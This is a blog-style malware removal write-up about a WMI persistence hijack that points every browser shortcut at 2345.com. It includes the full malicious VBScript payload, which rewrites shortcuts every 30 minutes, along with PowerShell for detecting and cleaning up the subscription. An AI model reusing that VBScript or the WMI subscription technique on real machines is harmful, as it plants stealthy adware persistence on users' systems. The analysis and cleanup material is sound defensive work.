The real fix for Chrome being hijacked to hao123.com and similar malicious links
2017-05-18 09:13
One day I wanted to download something from verycd.com, searched for a "verycd link viewer" (the reasons are best left unsaid, you know why), and promptly swallowed a fly...
It could not find any download links at all, so I just deleted it. From then on, though, every time I opened a browser it jumped straight to http://www.2345.com/, and it happened in every browser I tried: Chrome, Firefox, Opera, Safari, Internet Explorer, Maxthon. I checked the home page setting in each of them: all normal!
Eventually I found that the shortcut commands on the Quick Launch bar had been modified. A modified one looked like this:
"C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.2345.com/?kunown
So I assumed this was an ordinary shortcut modification and removed the "http://www.2345.com/?kunown" part by hand. That did not last: half an hour later it had been changed back. That settled it: the system was infested.
Norton was installed on this machine and detected nothing.
I also installed Super Rabbit (超级兔子), 360 and ExterminateIt and scanned with them; nothing found either, so I uninstalled the lot. (Uninstalling Super Rabbit left its bundled browser junk behind! What garbage. I removed that by hand; no more on that.)
Watching with Process Monitor, I saw a scrcons.exe process start every 30 minutes, rewrite the Quick Launch shortcut commands, and exit again (lucky it was every 30 minutes; at once every 24 hours I would have been in real trouble). scrcons.exe is the WMI Standard Event Consumer scripting host, the process in which ActiveScriptEventConsumer scripts are executed. On Win7 the Opera Quick Launch shortcut it modified had a path like:
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk
![](http://img.blog.csdn.net/20170518091533947?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvc2hvdWxkbm90YXBwZWFyY2FsbQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
Some research showed this had to be a script scheduled through WMI: a permanent event subscription that runs it on a timer.
To inspect WMI events, download WMI Tools (Microsoft's WMI Administrative Tools) from the link below and install it:
Link: http://pan.baidu.com/s/1hrO5T32 Password: s69f
After installing, open WMI Event Viewer, click "Register for events" at the top left, and in the "Connect to namespace" dialog that pops up enter "root\subscription" (the default, root\CIMV2, also gets you in), then confirm. You will see the following:
![](http://img.blog.csdn.net/20170518091000935?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvc2hvdWxkbm90YXBwZWFyY2FsbQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
On the left click _EventFilter:Name="unown_filter", then on the right right-click ActiveScriptEventConsumer Name="unown" and choose "View instance properties", as shown below:
![](http://img.blog.csdn.net/20170518091030928?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvc2hvdWxkbm90YXBwZWFyY2FsbQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
The ScriptText property shows a piece of VBScript. WMI runs it every 30 minutes (the interval is defined by the bound __EventFilter, not by the script itself) and it sets the arguments of every browser shortcut to "http://www.2345.com/?kunown". Caught you! It hides well: no resident process and no file of its own. The script lives inside the WMI repository (%SystemRoot%\System32\wbem\Repository) and only surfaces as a short-lived scrcons.exe when the filter fires. Damn!
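The same inspection can be done without the WMI Tools GUI. The PowerShell below is an added example, not code from the original post: it walks every __FilterToConsumerBinding in root\subscription and pairs each filter's WQL query with the consumer it fires and that consumer's payload, which is exactly the pair ("unown_filter", "unown") the screenshots above show. The subscription names are taken from this post; everything else is generic. Run it from an elevated PowerShell 3.0 or later.

```powershell
# Added example (not from the original post): enumerate permanent WMI event
# subscriptions. Permanent subscriptions can live in any namespace;
# root\subscription is the conventional one, root\default the other common spot.
function Get-WmiPersistence {
    param([string]$Namespace = 'root\subscription')

    $filters   = @(Get-CimInstance -Namespace $Namespace -ClassName __EventFilter)
    # __EventConsumer is the abstract base class; enumerating it returns every
    # concrete consumer (ActiveScript, CommandLine, LogFile, NTEventLog, SMTP).
    $consumers = @(Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer)
    $bindings  = @(Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Binding properties Filter/Consumer are references; their Name is the key.
        $f = $filters   | Where-Object Name -eq $b.Filter.Name   | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $b.Consumer.Name | Select-Object -First 1
        [pscustomobject]@{
            Namespace     = $Namespace
            Filter        = $b.Filter.Name
            # The WQL query is where the cadence is defined (a timer event or a
            # polling __InstanceModificationEvent query, for example).
            Query         = $f.Query
            ConsumerClass = $c.CimClass.CimClassName
            Consumer      = $b.Consumer.Name
            # ActiveScriptEventConsumer carries the script inline in ScriptText;
            # CommandLineEventConsumer carries a command line instead.
            Payload       = if ($c.ScriptText) { $c.ScriptText } else { $c.CommandLineTemplate }
        }
    }
}

# Dump everything, then flag consumers that execute a script or a command line;
# on a workstation a legitimate subscription rarely needs either.
$subs = @('root\subscription', 'root\default') | ForEach-Object { Get-WmiPersistence -Namespace $_ }
$subs | Format-List
$subs | Where-Object { $_.Payload } | ForEach-Object {
    "SUSPECT: $($_.Namespace) filter '$($_.Filter)' -> $($_.ConsumerClass) '$($_.Consumer)'"
}
```

On the machine described here this prints the "unown_filter" query alongside the ActiveScriptEventConsumer "unown" and its full ScriptText (the VBScript reproduced below), so the trigger and the payload can be read together.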
The affected browsers (just about every browser there is):
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"
The full script (stored in ScriptText as a single colon-separated line; broken into lines here for readability) is as follows:
```vbscript
On Error Resume Next
Const link = "http://www.2345.com/?kunown"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", _
                 "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", _
                 "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
' Lower-cased lookup table of browser executable names
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsers
    oDic.Add LCase(browser), browser
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
' Folders whose .lnk files get rewritten (the user profile paths are hard-coded for this victim)
strDesktop = "C:\Users\Gemini\Desktop"
strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop")
QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu"
UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar"
' The same loop body is repeated five times: for every .lnk whose target is a listed
' browser, set the shortcut arguments to the hijack URL, clearing read-only (bit 1) first.
For Each file In fso.GetFolder(strDesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oShellLink = WshShell.CreateShortcut(file.Path)
        path = oShellLink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If oDic.Exists(LCase(name)) Then
            oShellLink.Arguments = link
            If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
            End If
            oShellLink.Save
        End If
    End If
Next
For Each file In fso.GetFolder(strAllUsersDesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oShellLink = WshShell.CreateShortcut(file.Path)
        path = oShellLink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If oDic.Exists(LCase(name)) Then
            oShellLink.Arguments = link
            If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
            End If
            oShellLink.Save
        End If
    End If
Next
If fso.FolderExists(QuickLaunch) Then
    For Each file In fso.GetFolder(QuickLaunch).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
End If
If fso.FolderExists(UserPinnedStartMenu) Then
    For Each file In fso.GetFolder(UserPinnedStartMenu).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
End If
If fso.FolderExists(UserPinnedTaskBar) Then
    For Each file In fso.GetFolder(UserPinnedTaskBar).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
End If
```
Finally, the cleanup: in WMI Event Viewer, right-click the "_EventFilter:Name="unown_filter"" item and delete it.
Won't delete?
Go to the WMI Tools install directory (for example C:\Program Files (x86)\WMI Tools), right-click wbemeventviewer.exe, choose "Run as administrator", and delete it from there.
Deleting the filter alone removes the trigger, but the ActiveScriptEventConsumer "unown" and the __FilterToConsumerBinding that ties the two together stay in the repository; delete those as well so nothing can bind the consumer to a new filter later.
Still not done: you also have to go through the browser shortcuts on the Quick Launch bar by hand and remove http://www.2345.com/?kunown from each one's arguments.
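The whole cleanup, subscription and shortcuts together, as an added PowerShell example (not the post's own procedure, which used the WMI Tools GUI and manual edits). The subscription names "unown_filter" / "unown" and the hijack URL come from this post; the folder list mirrors the five folders the script above rewrites, resolved for the current user instead of the hard-coded "Gemini" profile. It uses the same WScript.Shell COM object the malware used, so shortcut Arguments are read and written the same way. Run it elevated, and run it before touching the shortcuts by hand: while the subscription exists, scrcons.exe re-infects them within 30 minutes.

```powershell
# Added example (not from the original post): remove a permanent WMI event
# subscription and strip the injected argument from browser shortcuts.
function Remove-WmiPersistence {
    param(
        [string]$Namespace    = 'root\subscription',
        [string]$FilterName   = 'unown_filter',   # from the post's screenshots
        [string]$ConsumerName = 'unown'
    )
    # Binding first: it references both filter and consumer, so deleting only the
    # filter (the GUI step above) leaves an orphaned consumer and binding behind.
    Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding |
        Where-Object { $_.Filter.Name -eq $FilterName -or $_.Consumer.Name -eq $ConsumerName } |
        Remove-CimInstance -Verbose
    Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer |
        Where-Object Name -eq $ConsumerName |
        Remove-CimInstance -Verbose
    Get-CimInstance -Namespace $Namespace -ClassName __EventFilter |
        Where-Object Name -eq $FilterName |
        Remove-CimInstance -Verbose
}

function Repair-BrowserShortcuts {
    param([string]$BadArgument = 'http://www.2345.com/?kunown')
    $shell       = New-Object -ComObject WScript.Shell
    $quickLaunch = Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch'
    # Same five folders the VBScript walks, resolved for whoever runs this.
    $folders = @(
        [Environment]::GetFolderPath('Desktop'),
        [Environment]::GetFolderPath('CommonDesktopDirectory'),
        $quickLaunch,
        (Join-Path $quickLaunch 'User Pinned\StartMenu'),
        (Join-Path $quickLaunch 'User Pinned\TaskBar')
    ) | Where-Object { Test-Path $_ }

    foreach ($dir in $folders) {
        foreach ($lnk in Get-ChildItem -Path $dir -Filter *.lnk -Force -ErrorAction SilentlyContinue) {
            $sc = $shell.CreateShortcut($lnk.FullName)
            if ($sc.Arguments -like "*$BadArgument*") {
                # Remove only the injected token; keep any arguments the user had.
                $sc.Arguments = ($sc.Arguments -replace [regex]::Escape($BadArgument), '').Trim()
                $lnk.IsReadOnly = $false     # the malware cleared this bit too; Save() needs it clear
                $sc.Save()
                $lnk.FullName                 # emit the repaired path
            }
        }
    }
}

Remove-WmiPersistence
$repaired = @(Repair-BrowserShortcuts)
"Repaired $($repaired.Count) shortcut(s):"
$repaired
```

Re-run the enumeration afterwards to confirm no binding references "unown" any more. Sysmon (event IDs 19, 20 and 21) records the creation of WMI filters, consumers and bindings, which is the quickest way to catch this kind of persistence the moment it is planted rather than 30 minutes later in Process Monitor.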
That's all for now; if there are other after-effects, I'll see as I keep using the machine.
Well, at least the fly got spat out in the end!